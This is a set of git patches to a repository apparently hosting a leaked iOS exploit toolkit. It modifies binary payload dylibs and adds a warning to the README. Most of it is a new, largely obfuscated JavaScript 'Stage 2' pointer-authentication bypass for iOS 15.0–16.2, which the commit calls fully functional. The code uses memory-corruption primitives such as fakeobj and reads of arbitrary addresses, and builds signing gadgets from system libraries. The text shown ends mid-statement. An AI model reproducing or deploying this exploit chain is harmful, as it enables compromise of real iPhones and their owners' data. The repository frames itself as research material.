From 3d8e113aec9e3fece2a64cc21581a42271939763 Mon Sep 17 00:00:00 2001 From: khanhduytran0 Date: Thu, 12 Mar 2026 06:05:29 +0700 Subject: [PATCH 1/5] Disable automatic crash reporter deleting for entry4_type0x0a.dylib MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The last commit only actually disabled for entry0_type0x08.dylib‎ --- .../entry4_type0x0a.dylib | Bin 50344 -> 50344 bytes .../entry4_type0x0a.dylib | Bin 50344 -> 50344 bytes .../entry4_type0x0a.dylib | Bin 50344 -> 50344 bytes .../entry4_type0x0a.dylib | Bin 50344 -> 50344 bytes 4 files changed, 0 insertions(+), 0 deletions(-) diff --git a/payloads/1b2cbbde08f8b2330b7400abcb97c9573973e942/entry4_type0x0a.dylib b/payloads/1b2cbbde08f8b2330b7400abcb97c9573973e942/entry4_type0x0a.dylib index 8868ec47f9268d8f645088b80ed36f567893277e..f53bc3d1b239168e69a51ac67d86ca4c56aa1beb 100644 GIT binary patch delta 16 XcmZ3{$-JVIc>{kvWBg`;`WdbOHYWxq delta 16 XcmZ3{$-JVIc>{kvW6@@T`WdbOHkk%F diff --git a/payloads/c8a14d79a27953242d60243ee2f505a85d9232cc/entry4_type0x0a.dylib b/payloads/c8a14d79a27953242d60243ee2f505a85d9232cc/entry4_type0x0a.dylib index 8868ec47f9268d8f645088b80ed36f567893277e..f53bc3d1b239168e69a51ac67d86ca4c56aa1beb 100644 GIT binary patch delta 16 XcmZ3{$-JVIc>{kvWBg`;`WdbOHYWxq delta 16 XcmZ3{$-JVIc>{kvW6@@T`WdbOHkk%F diff --git a/payloads/e9f898587620186e31119fbf32660f26c1e048e0/entry4_type0x0a.dylib b/payloads/e9f898587620186e31119fbf32660f26c1e048e0/entry4_type0x0a.dylib index 7eea8777f6ff21ed1e2374391cee309b34512d99..5fa390b9e291824fde40cdd76ac85b67ccb8ee0f 100644 GIT binary patch delta 16 XcmZ3{$-JVIc>{kvWBg`;`WdbOHYWxq delta 16 XcmZ3{$-JVIc>{kvW6@@T`WdbOHkk%F diff --git a/payloads/f4120dc6717a489435d86943472c5a2444aac8e6/entry4_type0x0a.dylib b/payloads/f4120dc6717a489435d86943472c5a2444aac8e6/entry4_type0x0a.dylib index 8868ec47f9268d8f645088b80ed36f567893277e..f53bc3d1b239168e69a51ac67d86ca4c56aa1beb 100644 GIT binary patch delta 16 XcmZ3{$-JVIc>{kvWBg`;`WdbOHYWxq delta 16 XcmZ3{$-JVIc>{kvW6@@T`WdbOHkk%F From ed5854d3fd477052751c434713e13f184d575648 Mon Sep 17 00:00:00 2001 From: khanhduytran0 Date: Wed, 25 Mar 2026 07:17:55 +0700 Subject: [PATCH 2/5] Add warning --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index a1bb87f..5f9821b 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,8 @@ # Coruna +> [!CAUTION] +> This repository hosts captured malicious payloads and is intended for educational and research purposes only. While all C2 URLs have been shut down, the payloads may still contain potentially harmful code. + The leaked exploit toolkit for various iOS versions. Extracted from `https://sadjd.mijieqi[.]cn/group.html` Partially deobfuscated, symbolicated, and modified to load decrypted payloads by Claude (thanks @34306 for sponsor) and by hand. From 212d9c0a9b0432ea264cbe3fa338ce00ff6dc1cc Mon Sep 17 00:00:00 2001 From: ghh-jb Date: Mon, 6 Apr 2026 22:16:35 +0300 Subject: [PATCH 3/5] Added support for iOS 15.0-16.2 breezy15 userspace PAC bypass. Tested on iPhone SE 2020, the chain is fully functional. --- Stage2_15.0_16.2_breezy15.js | 1036 ++++++++++++++++++++++++++++++++++ 1 file changed, 1036 insertions(+) create mode 100755 Stage2_15.0_16.2_breezy15.js diff --git a/Stage2_15.0_16.2_breezy15.js b/Stage2_15.0_16.2_breezy15.js new file mode 100755 index 0000000..31b74e8 --- /dev/null +++ b/Stage2_15.0_16.2_breezy15.js @@ -0,0 +1,1036 @@ +let r = {}; +window.log(`[Stage 2] Loaded evalCode`); +globalThis.moduleManager.evalCode("ba712ef6c1bf20758e69ab945d2cdfd51e53dcd8", function() { + let r = {}; + + const x = globalThis.moduleManager.getModuleByName("57620206d62079baad0e57e6d9ec93120c0f5247"), + { + N: G + } = globalThis.moduleManager.getModuleByName("57620206d62079baad0e57e6d9ec93120c0f5247"), + P = globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0"), + { + zn: F + } = globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0"), + Z = F.Ln; + window.log(`[Stage 2] Loaded modules`); + + function Y(t, r = !1) { + const e = P.platformState.exploitPrimitive, + n = e.read32FromInt64(t.H(16)); + let s = t.H(32), + i = new x.Vt(0, 0), + o = !0, + h = !1, + c = null, + l = null, + f = null, + a = 0, + u = null, + d = null, + w = null, + g = null, + m = !1; + const E = []; + for (let f = 0; f < n; f++) { + const n = e.read32FromInt64(s), + f = e.read32FromInt64(s.H(4)); + switch (n) { + case 15: + m = !0; + break; + case 50: + r && 1 === e.read32FromInt64(s.H(8)) && (w = !0, g = e.read32FromInt64(s.H(12))); + break; + case 25: { + const n = { + Xe: e.readStringFromInt64(s.H(8), 16), + qe: e.readInt64FromInt64(s.H(24)), + Eo: e.readInt64FromInt64(s.H(24)), + Oo: e.readInt64FromInt64(s.H(32)), + Qe: e.readInt64FromInt64(s.H(40)), + zo: e.readInt64FromInt64(s.H(48)), + $o: e.read32FromInt64(s.H(56)), + qo: e.read32FromInt64(s.H(60)), + Mo: e.read32FromInt64(s.H(64)), + flags: e.read32FromInt64(s.H(68)), + Do: s.H(72), + Lo: {}, + dump() {} + }; + if (r) + for (let t = 0; t < n.Mo; t += 1) { + const r = n.Do.H(80 * t), + s = { + Xe: e.readStringFromInt64(r.H(16), 16), + Vo: e.readStringFromInt64(r.H(0), 16), + qe: e.readInt64FromInt64(r.H(32)), + Oo: e.readInt64FromInt64(r.H(40)), + Qe: e.read32FromInt64(r.H(48)), + dump() {} + }; + n.Lo[s.Vo] = s + } + switch (E.push(n), n.Xe) { + case ([111, 111, 100, 117, 104, 100].map(x => { + return String.fromCharCode(x ^ 48); + }).join("")): + n.Qe.Et() ? o = !1 : l = t.sub(n.Qe), i = t.sub(n.qe); + break; + case ([105, 105, 122, 127, 120, 125, 115, 114, 127, 98].map(x => { + return String.fromCharCode(x ^ 54); + }).join("")): + u = n.qe.add(i).sub(n.Qe); + break; + case ([44, 44, 50, 38, 39, 59, 44, 48, 60, 61, 32, 39].map(x => { + return String.fromCharCode(x ^ 115); + }).join("")): + if (r) { + const t = n.Lo.__auth_got; + void 0 !== t && (d = t.qe.add(i)) + } + } + break + } + case (4294967296 + (929916783 ^ -1217566899)): + h = !0, c = e.read32FromInt64(s.H(40)), a = e.read32FromInt64(s.H(44)); + break; + case (4294967296 + (1867658329 ^ -279825302)): + h = !0, c = e.read32FromInt64(s.H(8)), a = e.read32FromInt64(s.H(12)) + } + s = s.H(f) + } + let _ = i; + if (r && !o && !m) { + const r = e.read32FromInt64(t.H(4)); + if (w && (1932683608 ^ 1915906388) === r && g >= (1466849650 ^ 1466259826)) { + if (null === d) throw new Error(""); + let t = e.readInt64FromInt64(d).Dt(); + if (t.Et()) throw new Error(""); + for (t = t.Bt(t.it % (1699169646 ^ 1699173742)); + (4294967296 + (1314404404 ^ -1330265349)) !== e.read32FromInt64(t);) t = t.Bt((1714972491 ^ 1714976587)); + const r = this.Xo(t); + l = r.Ho.Zo, _ = r.Ho.Ko + } + } + for (let t = 0; t < E.length; t++) { + const r = E[t], + e = r.qe; + r.qe = e.add(i) + } + return h && c && (f = u.H(c)), new tt({ + Go: t, + Jo: n, + Qo: i, + Yo: u, + Zo: l, + Ko: _, + th: f, + rh: a + }, E) + } + r.ur = function() { + return Y(P.zn.yn, !0) + }, r.Xo = Y; + class tt { + constructor(t, r) { + this.Ho = t, this.eh = r, this.nh = new Uint8Array([]), this.sh = !1 + } + sr() { + return new rt(this) + } + ar() { + return new et(this) + } + ih(t) { + const r = this.oh(([107].map(x => { + return String.fromCharCode(x ^ 52) + }).join("")) + (t)); + return r ? this.Ho.Go.H(r) : new x.Vt(0, 0) + } + oh(t) { + if (!1 === this.sh) { + this.sh = !0; + const t = new Uint32Array(this.Ho.rh + 3 >> 2); + for (let r = 0; r < t.length; r++) t[r] = P.platformState.exploitPrimitive.read32FromInt64(this.Ho.th.H(4 * r)); + this.nh = new Uint8Array(t.buffer) + } + const r = this.nh; + let e = "", + n = 0, + s = !1; + for (; !s;) { + s = !0; + let i = 0, + o = 0; + do { + i += ((2004504407 ^ 2004504360) & r[n]) << o, o += 7 + } while ((1598192238 ^ 1598192366) & r[n++]); + if (e === t && 0 !== i) { + n++; + let t = 0; + o = 0; + do { + t += ((2018992691 ^ 2018992716) & r[n]) << o, o += 7 + } while ((1783716180 ^ 1783716308) & r[n++]); + return t + } + n += i; + const h = r[n++]; + for (let i = 0; i < h; i++) { + let i = ""; + for (; 0 !== r[n];) i += String.fromCharCode(r[n++]); + n++; + let h = 0; + o = 0; + do { + h += ((2053530479 ^ 2053530384) & r[n]) << o, o += 7 + } while ((1936946514 ^ 1936946642) & r[n++]); + if (i.length && e + i === t.substr(0, e.length + i.length)) { + e += i, n = h, s = !1; + break + } + } + } + return 0 + } + } + class rt { + constructor(t) { + this.hh = t, this.lh = this.hh.Ho.Go + } + ih(t) { + const r = this.hh.oh(([109].map(x => { + return String.fromCharCode(x ^ 50) + }).join("")) + (t)); + return r ? this.hh.Ho.Go.H(r) : new x.Vt(0, 0) + } + fh(t) { + const r = this.hh.oh(([57].map(x => { + return String.fromCharCode(x ^ 102) + }).join("")) + (t)); + if (!r) throw new Error(""); + return r ? this.hh.Ho.Go.H(r) : new x.Vt(0, 0) + } + ah(t) { + return 0 !== this.hh.oh(([5].map(x => { + return String.fromCharCode(x ^ 90) + }).join("")) + (t)) + } + dlsym(t) { + const r = this.hh.oh("_" + t); + if (!r) throw new Error("Stage2 rt.dlsym(" + t + "): symbol not found"); + return r ? this.hh.Ho.Go.H(r) : new x.Vt(0, 0) + } + uh(...t) { + for (const r of t) try { + return this.fh(r) + } catch (t) { + continue + } + throw new Error("") + } + } + class et { + constructor(t) { + this.hh = t, this.dh = null, this.wh = this.hh.Ho.Go.yt() + } + ih(t) { + const r = this.hh.oh(([25].map(x => { + return String.fromCharCode(x ^ 70) + }).join("")) + (t)); + return r ? this.wh + r : 0 + } + uh(...t) { + for (const r of t) try { + return this.fh(r) + } catch (t) { + continue + } + throw new Error("") + } + ah(t) { + return 0 !== this.hh.oh(([17].map(x => { + return String.fromCharCode(x ^ 78) + }).join("")) + (t)) + } + fh(t) { + const r = this.hh.oh(([51].map(x => { + return String.fromCharCode(x ^ 108) + }).join("")) + (t)); + if (!r) throw new Error(""); + return this.wh + r + } + dlsym(t) { + const r = this.hh.oh("_" + t); + if (!r) throw new Error("Stage2 et.dlsym(" + t + "): symbol not found"); + return this.wh + r + } + gh(t) { + return { + Xe: t.Xe, + qe: t.qe.yt(), + Eo: t.Eo.yt(), + Oo: t.Oo.yt(), + Qe: t.Qe.yt(), + zo: t.zo.yt(), + $o: t.$o, + qo: t.qo, + Mo: t.Mo, + flags: t.flags, + Do: t.Do.yt(), + Lo: t.Lo + } + } + mh(t) { + return { + Xe: t.Xe, + Vo: t.Vo, + qe: t.qe.yt(), + Oo: t.Oo.yt(), + Qe: t.Qe.yt() + } + } + Eh(t) { + for (let r = 0; r < this.hh.eh.length; r++) + if (this.hh.eh[r].Xe === t) return this.gh(this.hh.eh[r]); + return null + } + _h(t, r) { + const e = this.Eh(t); + if (null !== e) { + if (0 !== Object.keys(e.Lo).length) { + const t = e.Lo[r]; + return void 0 !== t ? this.mh(t) : null + } { + let n = null; + for (let s = 0; s < e.Mo; s++) { + const i = e.Do + 80 * s, + o = t, + h = P.platformState.exploitPrimitive.readString(i, 16), + c = { + Xe: o, + Vo: h, + qe: P.platformState.exploitPrimitive.readInt64FromOffset(i + 32).add(this.hh.Ho.Qo), + Oo: P.platformState.exploitPrimitive.readInt64FromOffset(i + 40), + Qe: P.platformState.exploitPrimitive.readInt64FromOffset(i + 48) + }; + r === h && (n = c), e.Lo[h] = c + } + return n ? this.mh(n) : null + } + } + return null + } + bh(t, r) { + const e = this.Eh(t); + if (null !== e) + for (let n = 0; n < e.Mo; n++) { + const s = e.Do + 80 * n, + i = t, + o = P.platformState.exploitPrimitive.readString(s, 16); + if (r === o) { + const t = { + Xe: i, + Vo: o, + qe: P.platformState.exploitPrimitive.readInt64FromOffset(s + 32).add(this.hh.Ho.Qo), + Oo: P.platformState.exploitPrimitive.readInt64FromOffset(s + 40), + Qe: P.platformState.exploitPrimitive.readInt64FromOffset(s + 48) + }; + return this.mh(t) + } + } + return null + } + ph(t) { + const r = this.Eh(t); + if (!r) throw new Error(""); + return r + } + Sh() { + return null === this.dh && (this.dh = new nt(this.hh.Ho.Ko.yt(), this.hh.Ho.Zo.yt())), this.dh + } + xh(t) { + const r = this.ih(t); + return 0 !== r ? P.platformState.exploitPrimitive.readInt64FromOffset(r) : new x.Vt(0, 0) + } + Ih(t) { + const r = this.ph(([61, 61, 54, 39, 58, 54].map(x => { + return String.fromCharCode(x ^ 98); + }).join(""))); + return t - r.Eo + r.qe + } + Th(t) { + const r = this.ih(t); + return 0 !== r ? P.platformState.exploitPrimitive.readRawBigInt(r) : 0 + } + yh(t, r) { + const e = this.ih(t); + return 0 !== e ? P.platformState.exploitPrimitive.readByte(e) : r + } + kh(t, r) { + const e = this.Eh(t); + if (null === e) throw new Error(""); + for (let t = 0; t < e.Oo; t += 8) { + const n = e.qe + t; + if (P.platformState.exploitPrimitive.read32(n) === r >>> 0 && P.platformState.exploitPrimitive.read32(n + 4) === r / 4294967296 >>> 0) return n + } + throw new Error("") + } + Oh(t, r) { + const e = this.Eh(t); + if (null === e) throw new Error(""); + const n = e.qe, + s = e.qe + e.Oo; + return r >= n && r < s + } + zh(t, r, e) { + const n = this._h(t, r); + if (null === n) throw new Error(""); + const s = n.qe, + i = n.qe + n.Oo; + return e >= s && e < i + } + Ph(t) { + for (let r = 0; r < this.hh.eh.length; r++) + if (this.Oh(this.hh.eh[r].Xe, t)) return !0; + return !1 + } + Uh(t, r) { + const e = this.Eh(t); + if (null === e) throw new Error(""); + for (let t = 0; t < e.Oo; t += 8) + if (P.platformState.exploitPrimitive.readDoubleAsPointer(e.qe + t) === r) return e.qe + t; + throw new Error("") + } + Ah(t, r) { + const e = this.Eh(t); + if (null === e) throw new Error(""); + for (let t = 0; t < e.Oo; t += 8) + if (P.platformState.exploitPrimitive.readDoubleAsPointer(e.qe + t) === r) return P.platformState.exploitPrimitive.readInt64FromOffset(e.qe + t); + throw new Error("") + } + $h(t, r, e) { + const n = this.Eh(t); + if (null === n) throw new Error(""); + const s = this.Eh(r); + if (null === s) throw new Error(""); + for (let t = 0; t < s.Oo; t += 8) { + const r = P.platformState.exploitPrimitive.readDoubleAsPointer(s.qe + t); + if (r >= n.qe && r < n.qe + n.Oo && !0 === e(r, P.platformState.exploitPrimitive.readInt64FromOffset(s.qe + t))) break + } + } + qh(t, r) { + const e = this.Eh(t); + if (null === e) throw new Error(""); + for (let t = 0; t < e.Oo; t += 4) { + const n = e.qe + t; + if (!0 === r(n, P.platformState.exploitPrimitive.read32(n))) break + } + } + Rh(t, r) { + const e = this.Eh(t); + if (null === e) throw new Error(""); + for (let t = 0; t < e.Oo; t += 8) { + const n = e.qe + t; + if (!0 === r(Z.ut(n))) break + } + } + Ch(t) { + for (const r of this.hh.eh) { + const e = Z.ut(r.qe), + n = Z.ut(r.qe).H(x._(r.Oo)); + if (t.Pi(e) && t.Si(n)) return r + } + return null + } + } + class nt { + constructor(t, r) { + this.Mh = t, this.Dh = r, this.Lh = !1, this.Bh = {}, this.images = this.Nh() + } + Vh() { + return P.platformState.exploitPrimitive.readString(this.Dh) + } + Xh() { + return ([54, 43, 62, 54, 13, 36, 99, 114, 114, 51, 32, 63, 100, 102, 55].map(x => { + return String.fromCharCode(x ^ 82); + }).join("")) === this.Vh() + } + Zh() { + return this.Mh + } + Nh() { + const t = []; + if (!this.Vh().startsWith(([13, 16, 5, 13].map(x => { + return String.fromCharCode(x ^ 105); + }).join("")))) throw new Error(""); + let r = P.platformState.exploitPrimitive.read32(this.Dh + 24), + e = P.platformState.exploitPrimitive.read32(this.Dh + 28); + if (0 === r && 0 === e && (this.Lh = !0, r = P.platformState.exploitPrimitive.read32(this.Dh + (1282692186 ^ 1282692506)), e = P.platformState.exploitPrimitive.read32(this.Dh + (946890306 ^ 946890630)), 0 === r && 0 === e)) throw new Error(""); + for (let n = 0; n < e; n++) { + const e = this.Dh + r + 32 * n, + s = P.platformState.exploitPrimitive.readDoubleAsPointer(e) + this.Mh, + i = P.platformState.exploitPrimitive.read32(e + 24), + o = P.platformState.exploitPrimitive.readString(this.Dh + i); + t.push({ + address: s, + path: o + }) + } + return t + } + jh() { + const t = []; + for (const r of this.images) t.push(r.path); + return t + } + Fh(t, r) { + return this.Hh(t).fh(r) + } + Kh(t) { + for (const r of this.images) try { + return this.Hh(r.path).fh(t) + } catch (t) { + continue + } + throw new Error("") + } + Gh(t) { + for (let r = 0; r < this.images.length; r++) + if (-1 !== this.images[r].path.indexOf(t)) return this.images[r].address; + return 0 + } + Hh(t) { + if (void 0 === this.Bh[t]) { + const r = this.Gh(t); + if (0 === r) return null; + this.Bh[t] = Y(x.Vt.ut(r)).ar() + } + return this.Bh[t] + } + Jh(t) { + const r = this.Hh(t); + if (null === r) throw new Error(""); + return r + } + Qh(...t) { + for (const r of t) try { + return this.Jh(r) + } catch (t) {} + throw new Error("") + } + } + return r; +}); +window.log(`[Stage 2] starting PAC bypass`); +const x = globalThis.moduleManager.getModuleByName("57620206d62079baad0e57e6d9ec93120c0f5247"), + { + N: G, + tn: W, + nn: C, + Vt: m, + U: j, + An: S, + vn: O, + v: o, + I: u, + B: s + } = globalThis.moduleManager.getModuleByName("57620206d62079baad0e57e6d9ec93120c0f5247"), + P = globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0"); +window.log(`[Stage 2] New modules loaded`); + +class it { + constructor() { + this.tc = null, this.ic = null, this.cc = !1 + } + da(c, o) { + return new x.Vt(0, 0) + } + er(c, o) { + return new x.Vt(0, 0) + } + wa(c, o) { + return new x.Vt(0, 0) + } + ha(c, o) { + return new x.Vt(0, 0) + } +} +r.sc = it; +class ct { + constructor(c) { + this.lc = c + } + oc(c) { + let o = 0; + const i = []; + for (let t = 0; t < c.length; t++) { + const a = c[t]; - (1098461234 ^ 830025778) == ((4294967296 + (959279473 ^ -1506971279)) & a) ? (i.push(-(1097741133 ^ 563203244)), o++) : o && -(1697926471 ^ 1676954951) == ((4294967296 + (1835622770 ^ -1834393230)) & a) ? i.push(-(959670106 ^ 957127515)) : ((4294967296 + (2003204679 ^ -1956218297)) & a) >>> 0 == (863593306 ^ 662266714) ? i.push(-(2016949611 ^ 2084058475)) : i.push(-1) + } + return { + ac: o, + mask: i + } + } + hc(c) { + const o = this.lc.Jh(c), + i = new Set([(4294967296 + (1951289186 ^ -1569634435)), (4294967296 + (1683649092 ^ -1301972357)), (4294967296 + (1131951446 ^ -1790493431)), (4294967296 + (895831092 ^ -480623541)), (4294967296 + (1917215054 ^ -1535546927)), (4294967296 + (1666140978 ^ -1250933875)), (4294967296 + (1700417619 ^ -1285203828)), (4294967296 + (762729803 ^ -79077964))]), + t = []; + o.qh(([6, 6, 13, 28, 1, 13].map(x => { + return String.fromCharCode(x ^ 89); + }).join("")), ((c, o) => { + i.has(o) && t.push([c, o]) + })), t.length + } + dc(c, o, i) { + const t = this.lc.Jh(c), + { + ac: a, + mask: l + } = this.oc(o); + let b = null, + I = null, + s = null; + if (!0 === i ? (t.$h("__TEXT", !0 === globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.PgkJIA ? "__AUTH_CONST" : "__DATA_CONST", ((c, i) => { + let t = c; + for (let c = 0; c < o.length; c++) { + const i = P.platformState.exploitPrimitive.read32(t); + if ((o[c] & l[c]) != (i & l[c])) return !1; + t += ((4294967296 + (895838583 ^ -916100745)) & i) >>> 0 == (1466381158 ^ 1130836838) ? i << 6 >> 4 : 4 + } + return b = i, !0 + })), b && (I = b.Dt().yt(), s = b)) : (t.qh(([114, 114, 121, 104, 117, 121].map(x => { + return String.fromCharCode(x ^ 45); + }).join("")), ((c, i) => { + let t = !0; + for (let i = 0; i < o.length; i++) + if ((o[i] & l[i]) != (P.platformState.exploitPrimitive.read32(c + 4 * i) & l[i])) return t = !1, !1; + if (t) return b = c, !0 + })), I = b), null === b) throw new Error(""); + let d = []; + a && (d = this.bc(I, !1, a)); + let y = 0; + if (!1 === i) + for (let c = 0; c < (943940678 ^ 943944774); c += 4) { + if ((4294967296 + (1802791763 ^ -1099478996)) === P.platformState.exploitPrimitive.read32(b - c)) { + y = b - c; + break + } + } + return { + Ic: b, + ec: y, + gc: d, + yc: s + } + } + Cc(c, o) { + for (const i of c) try { + return this.dc(i, o, !0) + } catch (c) {} + throw new Error("") + } + uc(c, o) { + for (const i of c) try { + return this.dc(i, o, !1) + } catch (c) {} + throw new Error("") + } + rc(c) { + for (const o of this.lc.jh()) try { + return this.dc(o, c, !1) + } catch (c) {} + throw new Error("") + } + nc(c) { + for (const o of this.lc.jh()) try { + return this.dc(o, c, !0) + } catch (c) {} + throw new Error("") + } + bc(c, o, i = -1, t = !1) { + const a = []; + let l = !1; + const b = []; + for (let c = 0; c < 31; c++) b[c] = 0; + for (let i = 0; i < globalThis.moduleManager.getModuleByName(([101, 96, 98, 98, 109, 55, 53, 103, 54, 101, 97, 101, 109, 54, 53, 102, 53, 108, 50, 96, 100, 54, 49, 102, 108, 99, 50, 98, 96, 98, 48, 96, 48, 99, 97, 109, 103, 49, 54, 100].map(x => { + return String.fromCharCode(x ^ 84); + }).join(""))).platformState.versionFlags.KrBQWx; i++) { + const I = c + 4 * i, + s = P.platformState.exploitPrimitive.read32(I); + if ((4294967296 + (1867789176 ^ -1190445945)) === s || (4294967296 + (1296253527 ^ -1692647017)) === s) { + l = !0; + break + } + if (((4294967296 + (1464688462 ^ -1471324338)) & s) >>> 0 == (1764912242 ^ 2100456562)) { + if (t) { + l = !0; + break + } + } else if (((4294967296 + (1937274723 ^ -327649437)) & s) >>> 0 == (4294967296 + (1248289098 ^ -630759094))) { + const c = (s << 8 >> 13 << 2 | s >> 29 & 3) << 12; + b[31 & s] = I - I % (1346530659 ^ 1346534755) + c + } else if (((4294967296 + (1882207818 ^ -1880082870)) & s) >>> 0 == (4294967296 + (1316251250 ^ -1221302670))) { + const c = s >> 5 & 31, + o = s >> 10 & (1481665138 ^ 1481663885); + b[c] && a.push(b[c] + 8 * o) + } else if (o && ((4294967296 + (1114664778 ^ -1116704950)) & s) >>> 0 == (4294967296 + (1264994409 ^ -630830999))) { + const c = s >> 5 & 31, + o = s >> 10 & (1732666417 ^ 1732668366); + b[c] && (a.push(b[c] + o), b[c] = 0) + } + } + if (!l) throw new Error(""); + if (i > -1 && a.length !== i) throw new Error(""); + return a + } + Kc(c, o, i, t) { + const a = this.lc.Jh(c), + { + ac: l, + mask: b + } = this.oc(o); + let I = null, + s = null, + d = null; + if (!0 === i ? (a.$h("__TEXT", t, ((c, i) => { + let t = c; + for (let c = 0; c < o.length; c++) { + const i = P.platformState.exploitPrimitive.read32(t); + if ((o[c] & b[c]) != (i & b[c])) return !1; + t += ((4294967296 + (892613940 ^ -919325388)) & i) >>> 0 == (1937076037 ^ 1735749445) ? i << 6 >> 4 : 4 + } + return I = i, !0 + })), I && (s = I.Dt().yt(), d = I)) : (a.qh(([58, 58, 49, 32, 61, 49].map(x => { + return String.fromCharCode(x ^ 101); + }).join("")), ((c, i) => { + let t = !0; + for (let i = 0; i < o.length; i++) + if ((o[i] & b[i]) != (P.platformState.exploitPrimitive.read32(c + 4 * i) & b[i])) return t = !1, !1; + if (t) return I = c, !0 + })), s = I), null === I) throw new Error(""); + let y = []; + l && (y = this.bc(s, !1, l)); + let r = 0; + if (!1 === i) + for (let c = 0; c < (1146647130 ^ 1146643034); c += 4) { + if ((4294967296 + (1229616198 ^ -1672915143)) === P.platformState.exploitPrimitive.read32(I - c)) { + r = I - c; + break + } + } + return { + Ic: I, + ec: r, + gc: y, + yc: d + } + } + mc(c, o, i) { + for (const t of c) try { + return this.Kc(t, o, !0, i) + } catch (c) {} + throw new Error("") + } +} +const cc = globalThis.moduleManager.getModuleByName("ba712ef6c1bf20758e69ab945d2cdfd51e53dcd8"); +class oc extends it { + da(c, o) { + return this.Ka(this.La, c, o) + } + er(c, o) { + return this.Ka(this.Xa, c, o) + } + wa(c, o) { + return this.Ka(this.Ma, c, o) + } + ha(c, o) { + return this.Ka(this.Ga, c, o) + } + pacda(c, o) { + return this.da(c, o) + } + pacia(c, o) { + return this.er(c, o) + } + autda(c, o) { + return this.wa(c, o) + } + autia(c, o) { + return this.ha(c, o) + } + Mc() { + const c = this.Tc, + o = P.platformState.exploitPrimitive.fakeobj(c); + window.log(`[Stage 2] fakeobj TC o: ${o}`) + if (o % 4096 != 0) throw new Error("[Stage 2] fakeobj TC o % 4096 != 0"); + const i = x.Vt.ut(o).Ut(); + window.log(`[Stage 2] i o: ${i}`) + return c[0] = 4277009103, c[1] = 16777228, c[2] = 2, c[4] = 3, c[5] = 272, c[8] = 25, c[9] = 152, c[10] = 1163157343, c[11] = 21592, c[24] = 1, c[34] = i.it, c[35] = i.et, c[36] = 4294901760, c[37] = 127, c[42] = 2147484672, c[46] = 25, c[47] = 72, c[48] = 1229741919, c[49] = 1145391950, c[50] = 21577, c[52] = 304, c[56] = 304, c[64] = 2147483682, c[65] = 48, c[74] = 304, c[75] = 2048, c[76] = 1633616128, c[77] = 198144, c + } + constructor() { + super(), this.cc = !0; + let c = 64, + o = 16; + !0 === globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.QwxZcT && (c += 4, o -= 4); + let i = (758410840 ^ 758411176); + !0 === globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.QwxZcT && (i = (1448498021 ^ 1448497197)); + let t = 72, + a = 76; + !0 === globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.QwxZcT && (t = 80, a = 84), this.Tc = new Uint32Array(65536), x.D(this.Tc), this.lc = P.cr().Sh(), this.Pc = new ct(this.lc); + window.log(`[Stage 2] libdyld.dylib`); + const l = this.lc.Jh("libdyld.dylib"), + b = this.lc.Jh("libSystem.B.dylib"), + I = this.lc.Jh("libxml2.2.dylib"), + s = P.platformState.exploitPrimitive, + d = I.fh("xmlSAX2GetPublicId"); + if (3531603968 !== s.read32(d) || 3596551104 !== s.read32(d + 4)) throw new Error("3531603968 !== s.read32(d) || 3596551104 !== s.read32(d + 4)"); + let y; + y = I.Ah("__AUTH", d); + window.log(`[Stage 2] dlsym`); + const r = l.fh("dlsym"), + g = b.Ah(globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.PgkJIA ? "__AUTH_CONST" : "__DATA_CONST", r), + C = [], + e = function(c) { + C.push(c) + }; + this.Da = C; + e({ + x: null + }); + const u = {}; + e(u); + const n = function(c) { + const o = new Uint8Array(c), + i = s.fakeobj(o); + return u[i] = o, i + }; + let h = null; + window.log(`[Stage 2] CoreGraphics first entry`); + + try { + h = this.Pc.mc(["/System/Library/Frameworks/CoreGraphics.framework/CoreGraphics", "/System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics"], [2852193248, 402650939, 3019899104, 4181725186, 3019899042, 4181722120, 4181727233, 2852652000, 3592357983], "__AUTH_CONST") + } catch (c) { + h = this.Pc.mc(["/System/Library/Frameworks/CoreGraphics.framework/CoreGraphics", "/System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics"], [3019899073, 4181725218, 3019899010, 4181722144, 4181727265, 3592357983], "__AUTH_CONST") + } + let K = null; + window.log(`[Stage 2] CoreGraphics second entry`); + + try { + K = this.Pc.mc(["/System/Library/Frameworks/CoreGraphics.framework/CoreGraphics", "/System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics"], [4181730304, 402609294, 3019899104, 4181723139, 3019899043, 4181722120, 4181727234, 2852652000, 3592358015], ([44, 44, 50, 38, 39, 59, 44, 48, 60, 61, 32, 39].map(x => { + return String.fromCharCode(x ^ 115); + }).join(""))) + } catch (c) { + K = this.Pc.mc(["/System/Library/Frameworks/CoreGraphics.framework/CoreGraphics", "/System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics"], [4181730312, 3019899080, 4181723395, 3019899011, 4181722368, 4181727490, 3592358015], "__AUTH_CONST") + } + window.log(`[Stage 2] RESync first entry`); + + const m = this.Pc.mc(["/System/Library/PrivateFrameworks/RESync.framework/RESync", "/System/Library/PrivateFrameworks/RESync.framework/Versions/A/RESync"], [3573752703, 2847821812, 2835446781, 2432713725, 2852127731, 2953134088, 4182086920, 2852193248, 3594455327, 2852127732, 3036676224, 2953134088, 4182088968, 3594455327, 4177529460, 2839641085, 2831306740, 3596554239], "__AUTH"), + L = m.gc[0], + p = m.gc[1], + X = this.Pc.mc(["/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit"], [2839676936, 4181727233, 2852652000, 3592357983], "__AUTH_CONST"), + T = this.Pc.mc(["/usr/lib/libicucore.A.dylib"], [4181723171, 4181721120, 1384120321, 